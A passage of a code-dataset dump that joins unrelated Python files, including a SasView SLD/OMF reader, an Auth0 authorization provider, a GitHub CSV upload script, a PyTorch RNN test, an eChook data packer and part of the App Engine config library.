output.set_pixel_symbols(pix_symbol)
output.set_nodes()
output.set_pixel_volumes(vol_pix)
output.sld_unit = '1/A^(2)'
return output
except Exception:
raise RuntimeError("%s is not a sld file" % path)
def write(self, path, data):
"""
Write
"""
print("Not implemented... ")
class SLDReader(object):
"""
Class to load ascii files (7 columns).
"""
## File type
type_name = "SLD ASCII"
## Wildcards
type = ["sld files (*.SLD, *.sld)|*.sld",
"txt files (*.TXT, *.txt)|*.txt",
"all files (*.*)|*.*"]
## List of allowed extensions
ext = ['.sld', '.SLD', '.txt', '.TXT', '.*']
def read(self, path):
"""
Load data file
:param path: file path
:return MagSLD: x, y, z, sld_n, sld_mx, sld_my, sld_mz
:raise RuntimeError: when the file can't be opened
:raise ValueError: when the length of the data vectors are inconsistent
"""
try:
pos_x = np.zeros(0)
pos_y = np.zeros(0)
pos_z = np.zeros(0)
sld_n = np.zeros(0)
sld_mx = np.zeros(0)
sld_my = np.zeros(0)
sld_mz = np.zeros(0)
try:
# Use numpy to speed up loading
input_f = np.loadtxt(path, dtype='float', skiprows=1,
ndmin=1, unpack=True)
pos_x = np.array(input_f[0])
pos_y = np.array(input_f[1])
pos_z = np.array(input_f[2])
sld_n = np.array(input_f[3])
sld_mx = np.array(input_f[4])
sld_my = np.array(input_f[5])
sld_mz = np.array(input_f[6])
ncols = len(input_f)
if ncols == 8:
vol_pix = np.array(input_f[7])
elif ncols == 7:
vol_pix = None
except Exception:
# For older version of numpy
input_f = open(path, 'rb')
buff = decode(input_f.read())
lines = buff.split('\n')
input_f.close()
for line in lines:
toks = line.split()
try:
_pos_x = float(toks[0])
_pos_y = float(toks[1])
_pos_z = float(toks[2])
_sld_n = float(toks[3])
_sld_mx = float(toks[4])
_sld_my = float(toks[5])
_sld_mz = float(toks[6])
pos_x = np.append(pos_x, _pos_x)
pos_y = np.append(pos_y, _pos_y)
pos_z = np.append(pos_z, _pos_z)
sld_n = np.append(sld_n, _sld_n)
sld_mx = np.append(sld_mx, _sld_mx)
sld_my = np.append(sld_my, _sld_my)
sld_mz = np.append(sld_mz, _sld_mz)
try:
_vol_pix = float(toks[7])
vol_pix = np.append(vol_pix, _vol_pix)
except Exception as exc:
vol_pix = None
except Exception as exc:
# Skip non-data lines
logger.error(exc)
output = MagSLD(pos_x, pos_y, pos_z, sld_n,
sld_mx, sld_my, sld_mz)
output.filename = os.path.basename(path)
output.set_pix_type('pixel')
output.set_pixel_symbols('pixel')
if vol_pix is not None:
output.set_pixel_volumes(vol_pix)
return output
except Exception:
raise RuntimeError("%s is not a sld file" % path)
def write(self, path, data):
"""
Write sld file
:Param path: file path
:Param data: MagSLD data object
"""
if path is None:
raise ValueError("Missing the file path.")
if data is None:
raise ValueError("Missing the data to save.")
x_val = data.pos_x
y_val = data.pos_y
z_val = data.pos_z
vol_pix = data.vol_pix
length = len(x_val)
sld_n = data.sld_n
if sld_n is None:
sld_n = np.zeros(length)
sld_mx = data.sld_mx
if sld_mx is None:
sld_mx = np.zeros(length)
sld_my = np.zeros(length)
sld_mz = np.zeros(length)
else:
sld_my = data.sld_my
sld_mz = data.sld_mz
out = open(path, 'w')
# First Line: Column names
out.write("X Y Z SLDN SLDMx SLDMy SLDMz VOLUMEpix")
for ind in range(length):
out.write("\n%g %g %g %g %g %g %g %g" % \
(x_val[ind], y_val[ind], z_val[ind], sld_n[ind],
sld_mx[ind], sld_my[ind], sld_mz[ind], vol_pix[ind]))
out.close()
class OMFData(object):
"""
OMF Data.
"""
_meshunit = "A"
_valueunit = "A^(-2)"
def __init__(self):
"""
Init for mag SLD
"""
self.filename = 'default'
self.oommf = ''
self.title = ''
self.desc = ''
self.meshtype = ''
self.meshunit = self._meshunit
self.valueunit = self._valueunit
self.xbase = 0.0
self.ybase = 0.0
self.zbase = 0.0
self.xstepsize = 6.0
self.ystepsize = 6.0
self.zstepsize = 6.0
self.xnodes = 10.0
self.ynodes = 10.0
self.znodes = 10.0
self.xmin = 0.0
self.ymin = 0.0
self.zmin = 0.0
self.xmax = 60.0
self.ymax = 60.0
self.zmax = 60.0
self.mx = None
self.my = None
self.mz = None
self.valuemultiplier = 1.
self.valuerangeminmag = 0
self.valuerangemaxmag = 0
def __str__(self):
"""
doc strings
"""
_str = "Type: %s\n" % self.__class__.__name__
_str += "File: %s\n" % self.filename
_str += "OOMMF: %s\n" % self.oommf
_str += "Title: %s\n" % self.title
_str += "Desc: %s\n" % self.desc
_str += "meshtype: %s\n" % self.meshtype
_str += "meshunit: %s\n" % str(self.meshunit)
_str += "xbase: %s [%s]\n" % (str(self.xbase), self.meshunit)
_str += "ybase: %s [%s]\n" % (str(self.ybase), self.meshunit)
_str += "zbase: %s [%s]\n" % (str(self.zbase), self.meshunit)
_str += "xstepsize: %s [%s]\n" % (str(self.xstepsize),
self.meshunit)
_str += "ystepsize: %s [%s]\n" % (str(self.ystepsize),
self.meshunit)
_str += "zstepsize: %s [%s]\n" % (str(self.zstepsize),
self.meshunit)
_str += "xnodes: %s\n" % str(self.xnodes)
_str += "ynodes: %s\n" % str(self.ynodes)
_str += "znodes: %s\n" % str(self.znodes)
_str += "xmin: %s [%s]\n" % (str(self.xmin), self.meshunit)
_str += "ymin: %s [%s]\n" % (str(self.ymin), self.meshunit)
_str += "zmin: %s [%s]\n" % (str(self.zmin), self.meshunit)
_str += "xmax: %s [%s]\n" % (str(self.xmax), self.meshunit)
_str += "ymax: %s [%s]\n" % (str(self.ymax), self.meshunit)
_str += "zmax: %s [%s]\n" % (str(self.zmax), self.meshunit)
_str += "valueunit: %s\n" % self.valueunit
_str += "valuemultiplier: %s\n" % str(self.valuemultiplier)
_str += "ValueRangeMinMag:%s [%s]\n" % (str(self.valuerangeminmag),
self.valueunit)
_str += "ValueRangeMaxMag:%s [%s]\n" % (str(self.valuerangemaxmag),
self.valueunit)
return _str
def set_m(self, mx, my, mz):
"""
Set the Mx, My, Mz values
"""
self.mx = mx
self.my = my
self.mz = mz
class MagSLD(object):
"""
Magnetic SLD.
"""
pos_x = None
pos_y = None
pos_z = None
sld_n = None
sld_mx = None
sld_my = None
sld_mz = None
# Units
_pos_unit = 'A'
_sld_unit = '1/A^(2)'
_pix_type = 'pixel'
def __init__(self, pos_x, pos_y, pos_z, sld_n=None,
sld_mx=None, sld_my=None, sld_mz=None, vol_pix=None):
"""
Init for mag SLD
:params : All should be numpy 1D array
"""
self.is_data = True
self.filename = ''
self.xstepsize = 6.0
self.ystepsize = 6.0
self.zstepsize = 6.0
self.xnodes = 10.0
self.ynodes = 10.0
self.znodes = 10.0
self.has_stepsize = False
self.has_conect = False
self.pos_unit = self._pos_unit
self.sld_unit = self._sld_unit
self.pix_type = 'pixel'
self.pos_x = pos_x
self.pos_y = pos_y
self.pos_z = pos_z
self.sld_n = sld_n
self.line_x = None
self.line_y = None
self.line_z = None
self.sld_mx = sld_mx
self.sld_my = sld_my
self.sld_mz = sld_mz
self.vol_pix = vol_pix
self.sld_m = None
self.sld_phi = None
self.sld_theta = None
self.pix_symbol = None
if sld_mx is not None and sld_my is not None and sld_mz is not None:
self.set_sldms(sld_mx, sld_my, sld_mz)
self.set_nodes()
def __str__(self):
"""
doc strings
"""
_str = "Type: %s\n" % self.__class__.__name__
_str += "File: %s\n" % self.filename
_str += "Axis_unit: %s\n" % self.pos_unit
_str += "SLD_unit: %s\n" % self.sld_unit
return _str
def set_pix_type(self, pix_type):
"""
Set pixel type
:Param pix_type: string, 'pixel' or 'atom'
"""
self.pix_type = pix_type
def set_sldn(self, sld_n):
"""
Sets neutron SLD
"""
if sld_n.__class__.__name__ == 'float':
if self.is_data:
# For data, put the value to only the pixels w non-zero M
is_nonzero = (np.fabs(self.sld_mx) +
np.fabs(self.sld_my) +
np.fabs(self.sld_mz)).nonzero()
self.sld_n = np.zeros(len(self.pos_x))
if len(self.sld_n[is_nonzero]) > 0:
self.sld_n[is_nonzero] = sld_n
else:
self.sld_n.fill(sld_n)
else:
# For non-data, put the value to all the pixels
self.sld_n = np.ones(len(self.pos_x)) * sld_n
else:
self.sld_n = sld_n
def set_sldms(self, sld_mx, sld_my, sld_mz):
r"""
Sets mx, my, mz and abs(m).
""" # Note: escaping
if sld_mx.__class__.__name__ == 'float':
self.sld_mx = np.ones(len(self.pos_x)) * sld_mx
else:
self.sld_mx = sld_mx
if sld_my.__class__.__name__ == 'float':
self.sld_my = np.ones(len(self.pos_x)) * sld_my
else:
self.sld_my = sld_my
if sld_mz.__class__.__name__ == 'float':
self.sld_mz = np.ones(len(self.pos_x)) * sld_mz
else:
self.sld_mz = sld_mz
sld_m = np.sqrt(sld_mx * sld_mx + sld_my * sld_my + \
sld_mz * sld_mz)
self.sld_m = sld_m
def set_pixel_symbols(self, symbol='pixel'):
"""
Set pixel
:Params pixel: str; pixel or atomic symbol, or array of strings
"""
if self.sld_n is None:
return
if symbol.__class__.__name__ == 'str':
self.pix_symbol = np.repeat(symbol, len(self.sld_n))
else:
self.pix_symbol = symbol
def set_pixel_volumes(self, vol):
"""
Set pixel volumes
:Params pixel: str; pixel or atomic symbol, or array of strings
"""
if self.sld_n is None:
return
if vol.__class__.__name__ == 'ndarray':
self.vol_pix = vol
elif vol.__class__.__name__.count('float') > 0:
self.vol_pix = np.repeat(vol, len(self.sld_n))
else:
self.vol_pix = None
def get_sldn(self):
"""
Returns nuclear sld
"""
return self.sld_n
def set_nodes(self):
"""
Set xnodes, ynodes, and znodes
"""
self.set_stepsize()
if self.pix_type == 'pixel':
try:
xdist = (max(self.pos_x) - min(self.pos_x)) / self.xstepsize
ydist = (max(self.pos_y) - min(self.pos_y)) / self.ystepsize
zdist = (max(self.pos_z) - min(self.pos_z)) / self.zstepsize
self.xnodes = int(xdist) + 1
self.ynodes = int(ydist) + 1
self.znodes = int(zdist) + 1
except Exception:
self.xnodes = None
self.ynodes = None
self.znodes = None
else:
self.xnodes = None
self.ynodes = None
self.znodes = None
def set_stepsize(self):
"""
Set xtepsize, ystepsize, and zstepsize
"""
if self.pix_type == 'pixel':
try:
xpos_pre = self.pos_x[0]
ypos_pre = self.pos_y[0]
zpos_pre = self.pos_z[0]
for x_pos in self.pos_x:
if xpos_pre != x_pos:
self.xstepsize = np.fabs(x_pos - xpos_pre)
break
for y_pos in self.pos_y:
if ypos_pre != y_pos:
self.ystepsize = np.fabs(y_pos - ypos_pre)
break
for z_pos in self.pos_z:
if zpos_pre != z_pos:
self.zstepsize = np.fabs(z_pos - zpos_pre)
break
#default pix volume
self.vol_pix = np.ones(len(self.pos_x))
vol = self.xstepsize * self.ystepsize * self.zstepsize
self.set_pixel_volumes(vol)
self.has_stepsize = True
except Exception:
self.xstepsize = None
self.ystepsize = None
self.zstepsize = None
self.vol_pix = None
self.has_stepsize = False
else:
self.xstepsize = None
self.ystepsize = None
self.zstepsize = None
self.has_stepsize = True
return self.xstepsize, self.ystepsize, self.zstepsize
def set_conect_lines(self, line_x, line_y, line_z):
"""
Set bonding line data if taken from pdb
"""
if line_x.__class__.__name__ != 'list' or len(line_x) < 1:
return
if line_y.__class__.__name__ != 'list' or len(line_y) < 1:
return
if line_z.__class__.__name__ != 'list' or len(line_z) < 1:
return
self.has_conect = True
self.line_x = line_x
self.line_y = line_y
self.line_z = line_z
def _get_data_path(*path_parts):
from os.path import realpath, join as joinpath, dirname, abspath
# in sas/sascalc/calculator; want sas/sasview/test
return joinpath(dirname(realpath(__file__)),
'..', '..', 'sasview', 'test', *path_parts)
def test_load():
"""
Test code
"""
from mpl_toolkits.mplot3d import Axes3D
tfpath = _get_data_path("1d_data", "CoreXY_ShellZ.txt")
ofpath = _get_data_path("coordinate_data", "A_Raw_Example-1.omf")
if not os.path.isfile(tfpath) or not os.path.isfile(ofpath):
raise ValueError("file(s) not found: %r, %r"%(tfpath, ofpath))
reader = SLDReader()
oreader = OMFReader()
output = reader.read(tfpath)
ooutput = oreader.read(ofpath)
foutput = OMF2SLD()
foutput.set_data(ooutput)
import matplotlib.pyplot as plt
fig = plt.figure()
ax = Axes3D(fig)
ax.plot(output.pos_x, output.pos_y, output.pos_z, '.', c="g",
alpha=0.7, markeredgecolor='gray', rasterized=True)
gap = 7
max_mx = max(output.sld_mx)
max_my = max(output.sld_my)
max_mz = max(output.sld_mz)
max_m = max(max_mx, max_my, max_mz)
x2 = output.pos_x+output.sld_mx/max_m * gap
y2 = output.pos_y+output.sld_my/max_m * gap
z2 = output.pos_z+output.sld_mz/max_m * gap
x_arrow = np.column_stack((output.pos_x, x2))
y_arrow = np.column_stack((output.pos_y, y2))
z_arrow = np.column_stack((output.pos_z, z2))
unit_x2 = output.sld_mx / max_m
unit_y2 = output.sld_my / max_m
unit_z2 = output.sld_mz / max_m
color_x = np.fabs(unit_x2 * 0.8)
color_y = np.fabs(unit_y2 * 0.8)
color_z = np.fabs(unit_z2 * 0.8)
colors = np.column_stack((color_x, color_y, color_z))
plt.show()
def test_save():
ofpath = _get_data_path("coordinate_data", "A_Raw_Example-1.omf")
if not os.path.isfile(ofpath):
raise ValueError("file(s) not found: %r"%(ofpath,))
oreader = OMFReader()
omfdata = oreader.read(ofpath)
omf2sld = OMF2SLD()
omf2sld.set_data(omfdata)
writer = SLDReader()
writer.write("out.txt", omf2sld.output)
def test():
"""
Test code
"""
ofpath = _get_data_path("coordinate_data", "A_Raw_Example-1.omf")
if not os.path.isfile(ofpath):
raise ValueError("file(s) not found: %r"%(ofpath,))
oreader = OMFReader()
omfdata = oreader.read(ofpath)
omf2sld = OMF2SLD()
omf2sld.set_data(omfdata)
model = GenSAS()
model.set_sld_data(omf2sld.output)
x = np.linspace(0, 0.1, 11)[1:]
return model.runXY([x, x])
if __name__ == "__main__":
#test_load()
#test_save()
#print(test())
test()
|
StarcoderdataPython
|
3461432
|
from allauth.socialaccount.providers.oauth2.urls import default_urlpatterns
from .provider import AdRollProvider
urlpatterns = default_urlpatterns(AdRollProvider)
|
StarcoderdataPython
|
127927
|
import json
import requests
import base64
from past.builtins import basestring
from auth0_provider import Auth0Provider
class AuthzAssociationProvider(Auth0Provider, object):
"""
"""
def __init__(self, supported_resource_type, owner, owned, collection=None):
super(AuthzAssociationProvider, self).__init__()
self.supported_resource_type = supported_resource_type
self.owner = owner
self.owned = owned
self.collection = collection if collection is not None else '{}s'.format(owned)
@property
def audience(self):
return 'urn:auth0-authz-api'
def is_supported_resource_type(self):
return self.resource_type == self.supported_resource_type
def get_id(self, name):
value = self.get('Value')
if name in value and isinstance(value[name], basestring):
return value[name]
else:
return None
@property
def owner_id(self):
return self.get_id(self.owner)
@property
def owned_id(self):
return self.get_id(self.owned)
def is_valid_request(self):
if super(AuthzAssociationProvider, self).is_valid_request():
if self.request_type == 'Create' or self.request_type == 'Update':
value = self.get('Value')
if self.owner_id is None:
self.fail('missing property "{s.owner}" or not a string.'.format(s=self))
return False
if self.owned_id is None:
self.fail('missing property "{s.owned}" or not a string.'.format(s=self))
return False
return True
else:
return False
def get_owner_url(self, owner_id=None):
if owner_id is None:
owner_id = self.owner_id
return '{s.authz_url}/api/{s.owner}s/{owner_id}/{s.collection}'.format(s=self, owner_id=owner_id)
def encode_physical_resource_id(self):
v = json.dumps([self.owner_id, self.owned_id], ensure_ascii=False).encode("utf8")
self.physical_resource_id = base64.b64encode(v).decode('ascii')
def decode_physical_resource_id(self):
owner_id, owned_id = json.loads(base64.b64decode(self.physical_resource_id))
return owner_id, owned_id
def create_or_update(self):
self.add_authorization_header()
r = requests.patch(self.get_owner_url(), headers=self.headers, json=[self.owned_id])
if r.status_code == 200 or r.status_code == 204 or r.status_code == 201:
self.encode_physical_resource_id()
else:
self.fail('create {s.owner} failed with code {r.status_code}, {r.text}'.format(s=self, r=r))
def create(self):
self.create_or_update()
if self.status == 'FAILED':
self.physical_resource_id = 'could-not-create'
def update(self):
self.create_or_update()
def delete(self):
if self.physical_resource_id == 'could-not-create':
return
self.add_authorization_header()
owner_id, owned_id = self.decode_physical_resource_id()
r = requests.delete(self.get_owner_url(owner_id), headers=self.headers, json=[owned_id])
if r.status_code != 200 and r.status_code != 204:
self.fail('delete failed with code {r.status_code}, {r.text}'.format(r=r))
|
StarcoderdataPython
|
313496
|
import logging
# Log certificate warnings to 'warnings.log'.
class MyFilter(object):
def __init__(self, level):
self.__level = level
def filter(self, logRecord):
return logRecord.levelno == self.__level
def log_warnings():
handler = logging.FileHandler('warnings.log')
logging.captureWarnings(True)
logger = logging.getLogger('py.warnings')
logger.setLevel(logging.WARNING)
logger.addHandler(handler)
handler.addFilter(MyFilter(logging.WARNING))
logger = logging.getLogger('novaclient.api_versions')
logger.setLevel(logging.WARNING)
logger.addHandler(handler)
|
StarcoderdataPython
|
6688736
|
<reponame>Arun-Singh-Chauhan-09/Supply-demand-forecasting
from order import ExploreOrder
import matplotlib.pyplot as plt
import seaborn as sns
sns.set(color_codes=True)
from utility.datafilepath import g_singletonDataFilePath
from visualization import visualizeData
import numpy as np
import math
class VisualizeTestData(visualizeData):
def __init__(self):
ExploreOrder.__init__(self)
self.gapdf = self.load_gapdf(g_singletonDataFilePath.getTest1Dir())
return
def run(self):
self.disp_gap_bytimeiid()
# self.disp_gap_bydistrict()
# self.disp_gap_bydate()
return
if __name__ == "__main__":
obj= VisualizeTestData()
obj.run()
|
StarcoderdataPython
|
202392
|
# 4.12 Paths with Sum
# You are given a binary tree in which each node contains an integer value
# which might be positive or negative.
# Design an algorithm to count the number of paths that sum to a given value.
# The path does not need to start or end at the root or a leaf, but it must go
# downwards, traveling only from parent nodes to child nodes.
|
StarcoderdataPython
|
3454388
|
import hdfsWikipediaVisualizador
#hdfsWikipediaVisualizador.hdfsWikipediaLocal é um dic com as localizações do hdfs
#da wikipedia num dictionary de elementos ID = {"latitude": latitudeID, "longitude" : longitudeID}
import csvLinkedInVisualizador
#csvLinkedInVisualizador.csvLinkedinLocais é um dic com as localizações do csv
#do linkedin num dictionary de elementos ID = {"latitude": latitudeID, "longitude" : longitudeID}
import pandas as pd
import sys
#os allow us to manipulate dir, folders, files
import os
import os.path
from datetime import datetime
intersecction = []
list1 = csvLinkedInVisualizador.csvLinkedinLocais
list2 = hdfsWikipediaVisualizador.hdfsWikipediaLocal
for i in range(1, 2):
print(list1[i])
print(list2[i])
print("elementos da interseção: " + str(len(intersecction)))
|
StarcoderdataPython
|
9744299
|
print("Analisador de triângulo.")
r1 = float(input("Digite a medida da reta 1: "))
r2 = float(input("Digite a medida da reta 2: "))
r3 = float(input("Digite a medida da reta 3: "))
if r1 < r2 + r3 and r2 < r1 + r3 and r3 < r1 + r2:
print("Essas retas podem formar um triângulo!")
if r1 == r2 == r3:
print("Este triângulo é EQUILÁTERO.")
elif r1 != r2 != r3 != r1:
print("Este triângulo será ESCALENO.")
else:
print("Este triânulo é ISÓSCELES.")
else:
print("Essas retas não podem formar um triângulo.")
|
StarcoderdataPython
|
6626278
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import pytest
try:
import torch
except ImportError:
torch = None
@pytest.mark.skipif(torch is None, reason="Test requires pytorch")
def test_rnn_state_encoder():
from habitat_baselines.rl.models.rnn_state_encoder import (
build_rnn_state_encoder,
)
device = (
torch.device("cuda")
if torch.cuda.is_available()
else torch.device("cpu")
)
rnn_state_encoder = build_rnn_state_encoder(32, 32, num_layers=2).to(
device=device
)
rnn = rnn_state_encoder.rnn
with torch.no_grad():
for T in [1, 2, 4, 8, 16, 32, 64, 3, 13, 31]:
for N in [1, 2, 4, 8, 3, 5]:
masks = torch.randint(
0, 2, size=(T, N, 1), dtype=torch.bool, device=device
)
inputs = torch.randn((T, N, 32), device=device)
hidden_states = torch.randn(
rnn_state_encoder.num_recurrent_layers,
N,
32,
device=device,
)
outputs, out_hiddens = rnn_state_encoder(
inputs.flatten(0, 1),
hidden_states.permute(1, 0, 2),
masks.flatten(0, 1),
)
out_hiddens = out_hiddens.permute(1, 0, 2)
reference_ouputs = []
reference_hiddens = hidden_states.clone()
for t in range(T):
reference_hiddens = torch.where(
masks[t].view(1, -1, 1),
reference_hiddens,
reference_hiddens.new_zeros(()),
)
x, reference_hiddens = rnn(
inputs[t : t + 1], reference_hiddens
)
reference_ouputs.append(x.squeeze(0))
reference_ouputs = torch.stack(reference_ouputs, 0).flatten(
0, 1
)
assert (
torch.norm(reference_ouputs - outputs).item() < 1e-3
), "Failed on (T={}, N={})".format(T, N)
assert (
torch.norm(reference_hiddens - out_hiddens).item() < 1e-3
), "Failed on (T={}, N={})".format(T, N)
|
StarcoderdataPython
|
1812171
|
<reponame>imamol/license_automation<filename>lib/github.py
from __future__ import print_function
from builtins import input
import requests
from requests.auth import HTTPBasicAuth
import json
import base64
import getpass
import sys
import github3
def _get_sha(username, password, url):
r = requests.get(url,auth=HTTPBasicAuth(username, password))
print(r.text)
if r.status_code < 400:
data = json.loads(r.text)
return data['sha']
print("Creds validated..")
else:
print("Error in accessing github api to uplod file..")
exit()
def upload_file():
username = input("Github username: ")
password = getpass.getpass("Github passsword: ")
url = "https://api.github.ibm.com/repos/abhople/LicenseAutomation/contents/lib/DB_license_sheet.csv"
sha = _get_sha(username, password, url)
with open('lib/DB_license_sheet.csv') as file:
lines = file.read()
PY3 = sys.version_info[0] >= 3
if PY3:
lines = lines.encode()
file_data = base64.b64encode(lines)
file_data = file_data.decode()
else:
file_data = base64.b64encode(lines)
data = json.dumps({'message':'uploading new db', 'content':file_data, 'sha':sha})
r = requests.put(url,data, auth=HTTPBasicAuth(username, password))
if r.status_code < 400:
print("DB_license_sheet.csv uploaded on github")
else:
print("Error in accessing github api to upload file..")
exit()
def create_and_upload_file(username, password, repo, file_name):
gh = github3.login(username=username, password=password)
repository = gh.repository('junawaneshivani', 'build-scripts')
with open(file_name, 'rb') as fd:
contents = fd.read()
try :
repository.create_file(
path=repo,
message='Added generated License File ',
content=contents,
)
except Exception as e:
print (e)
return False
return True
|
StarcoderdataPython
|
6516620
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class VaultCertificate(Model):
"""Describes a single certificate reference in a Key Vault, and where the
certificate should reside on the VM.
:param certificate_url: This is the URL of a certificate that has been
uploaded to Key Vault as a secret. For adding a secret to the Key Vault,
see [Add a key or secret to the key
vault](https://docs.microsoft.com/azure/key-vault/key-vault-get-started/#add).
In this case, your certificate needs to be It is the Base64 encoding of
the following JSON Object which is encoded in UTF-8: <br><br> {<br>
"data":"<Base64-encoded-certificate>",<br> "dataType":"pfx",<br>
"password":"<<PASSWORD>>"<br>}
:type certificate_url: str
:param certificate_store: For Windows VMs, specifies the certificate store
on the Virtual Machine to which the certificate should be added. The
specified certificate store is implicitly in the LocalMachine account.
<br><br>For Linux VMs, the certificate file is placed under the
/var/lib/waagent directory, with the file name <UppercaseThumbprint>.crt
for the X509 certificate file and <UppercaseThumbpring>.prv for private
key. Both of these files are .pem formatted.
:type certificate_store: str
"""
_attribute_map = {
'certificate_url': {'key': 'certificateUrl', 'type': 'str'},
'certificate_store': {'key': 'certificateStore', 'type': 'str'},
}
def __init__(self, **kwargs):
super(VaultCertificate, self).__init__(**kwargs)
self.certificate_url = kwargs.get('certificate_url', None)
self.certificate_store = kwargs.get('certificate_store', None)
|
StarcoderdataPython
|
3383760
|
<reponame>fishbigger/echookPi<filename>sendData.py
"""
==================================
BLUETOOTH DATA PACKETING FUNCTIONS
==================================
* The two functions in this section handle packeting the data and sending it over USART to the bluetooth module. The two functions are
* identically named so are called the in the same way, however the first is run if the value passed to it is a float and the second is
* run if the value passed into it is an integer (an override function). For all intents and purposes you can ignore this and simply call
* 'sendData(identifier, value);' using one of the defined identifiers and either a float or integer value to send informaion over BT.
*
* identifier: see definitions at start of code
* value: the value to send (typically some caluclated value from a sensor)
"""
import random
def convertData(indentifier, value):
value = float(value)
if value == 0:
#It is impossible to send null bytes over Serial connection
#so instead we define zero as 0xFF or 11111111 i.e. 255
dataByte1 = 0xFF
dataByte2 = 0xFF
elif value <= 127:
#Values under 128 are sent as a float
#i.e. value = dataByte1 + dataByte2 / 100
integer = int(value)
tempDecimal = (value - integer) * 100;
decimal = int(tempDecimal)
dataByte1 = integer
dataByte2 = decimal
if decimal == 0:
dataByte2 = 0xFF
if integer == 0:
dataByte1 = 0xff
else:
#Values above 127 are sent as integer
#i.e. value = dataByte1 * 100 + dataByte2
hundreds = int(value / 100)
tens = value - hundreds * 100
dataByte1 = hundreds
dataByte1 += 128
dataByte2 = int(tens)
if tens == 0:
dataByte2 = 0xFF
if hundreds == 0:
dataByte1 = 0xFF
dataByte1.to_bytes(1, "big")
dataByte2.to_bytes(1, "big")
return dataByte1, dataByte2
try:
dataToSend = convertData("Vt", random.randint(0, 255))
with open ('/dev/rfcomm0', 'w', 1) as f:
f.write(dataToSend)
except:
print ("Something went wrong")
|
StarcoderdataPython
|
329609
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A library for managing flags-like configuration that update dynamically.
"""
import logging
import os
import re
import time
if os.environ.get('APPENGINE_RUNTIME') == 'python27':
from google.appengine.api import memcache
from google.appengine.ext import db
from google.appengine.api import validation
from google.appengine.api import yaml_object
else:
try:
from google.appengine.api import memcache
from google.appengine.ext import db
from google.appengine.api import validation
from google.appengine.api import yaml_object
except:
from google.appengine.api import memcache
from google.appengine.ext import db
from google.appengine.ext import validation
from google.appengine.ext import yaml_object
DATASTORE_DEADLINE = 1.5
RESERVED_MARKER = 'ah__conf__'
NAMESPACE = '_' + RESERVED_MARKER
CONFIG_KIND = '_AppEngine_Config'
ACTIVE_KEY_NAME = 'active'
FILENAMES = ['conf.yaml', 'conf.yml']
PARAMETERS = 'parameters'
PARAMETER_NAME_REGEX = '[a-zA-Z][a-zA-Z0-9_]*'
_cached_config = None
class Config(db.Expando):
"""The representation of a config in the datastore and memcache."""
ah__conf__version = db.IntegerProperty(default=0, required=True)
@classmethod
def kind(cls):
"""Override the kind name to prevent collisions with users."""
return CONFIG_KIND
def ah__conf__load_from_yaml(self, parsed_config):
"""Loads all the params from a YAMLConfiguration into expando fields.
We set these expando properties with a special name prefix 'p_' to
keep them separate from the static attributes of Config. That way we
don't have to check elsewhere to make sure the user doesn't stomp on
our built in properties.
Args:
parse_config: A YAMLConfiguration.
"""
for key, value in parsed_config.parameters.iteritems():
setattr(self, key, value)
class _ValidParameterName(validation.Validator):
"""Validator to check if a value is a valid config parameter name.
We only allow valid python attribute names without leading underscores
that also do not collide with reserved words in the datastore models.
"""
def __init__(self):
self.regex = validation.Regex(PARAMETER_NAME_REGEX)
def Validate(self, value, key):
"""Check that all parameter names are valid.
This is used as a validator when parsing conf.yaml.
Args:
value: the value to check.
key: A description of the context for which this value is being
validated.
Returns:
The validated value.
"""
value = self.regex.Validate(value, key)
try:
db.check_reserved_word(value)
except db.ReservedWordError:
raise validation.ValidationError(
'The config parameter name %.100r is reserved by db.Model see: '
'https://developers.google.com/appengine/docs/python/datastore/'
'modelclass#Disallowed_Property_Names for details.' % value)
if value.startswith(RESERVED_MARKER):
raise validation.ValidationError(
'The config parameter name %.100r is reserved, as are all names '
'beginning with \'%s\', please choose a different name.' % (
value, RESERVED_MARKER))
return value
class _Scalar(validation.Validator):
"""Validator to check if a value is a simple scalar type.
We only allow scalars that are well supported by both the datastore and YAML.
"""
ALLOWED_PARAMETER_VALUE_TYPES = frozenset(
[bool, int, long, float, str, unicode])
def Validate(self, value, key):
"""Check that all parameters are scalar values.
This is used as a validator when parsing conf.yaml
Args:
value: the value to check.
key: the name of parameter corresponding to this value.
Returns:
We just return value unchanged.
"""
if type(value) not in self.ALLOWED_PARAMETER_VALUE_TYPES:
raise validation.ValidationError(
'Expected scalar value for parameter: %s, but found %.100r which '
'is type %s' % (key, value, type(value).__name__))
return value
class _ParameterDict(validation.ValidatedDict):
"""This class validates the parameters dictionary in YAMLConfiguration.
Keys must look like non-private python identifiers and values
must be a supported scalar. See the class comment for YAMLConfiguration.
"""
KEY_VALIDATOR = _ValidParameterName()
VALUE_VALIDATOR = _Scalar()
class YAMLConfiguration(validation.Validated):
"""This class describes the structure of a conf.yaml file.
At the top level the file should have a params attribue which is a mapping
from strings to scalars. For example:
parameters:
background_color: 'red'
message_size: 1024
boolean_valued_param: true
"""
ATTRIBUTES = {PARAMETERS: _ParameterDict}
def LoadSingleConf(stream):
"""Load a conf.yaml file or string and return a YAMLConfiguration object.
Args:
stream: a file object corresponding to a conf.yaml file, or its contents
as a string.
Returns:
A YAMLConfiguration instance
"""
return yaml_object.BuildSingleObject(YAMLConfiguration, stream)
def _find_yaml_path():
"""Traverse directory trees to find conf.yaml file.
Begins with the current working direcotry and then moves up the
directory structure until the file is found..
Returns:
the path of conf.yaml file or None if not found.
"""
current, last = os.getcwd(), None
while current != last:
for yaml_name in FILENAMES:
yaml_path = os.path.join(current, yaml_name)
if os.path.exists(yaml_path):
return yaml_path
last = current
current, last = os.path.dirname(current), current
return None
def _fetch_from_local_file(pathfinder=_find_yaml_path, fileopener=open):
"""Get the configuration that was uploaded with this version.
Args:
pathfinder: a callable to use for finding the path of the conf.yaml
file. This is only for use in testing.
